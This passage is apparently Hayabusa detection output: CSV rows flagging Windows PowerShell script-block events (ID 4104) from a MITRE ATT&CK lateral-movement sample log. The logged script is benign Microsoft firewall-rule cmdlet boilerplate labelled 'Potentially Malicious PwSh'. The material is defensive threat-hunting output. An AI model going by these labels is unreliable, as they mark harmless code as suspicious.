$false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 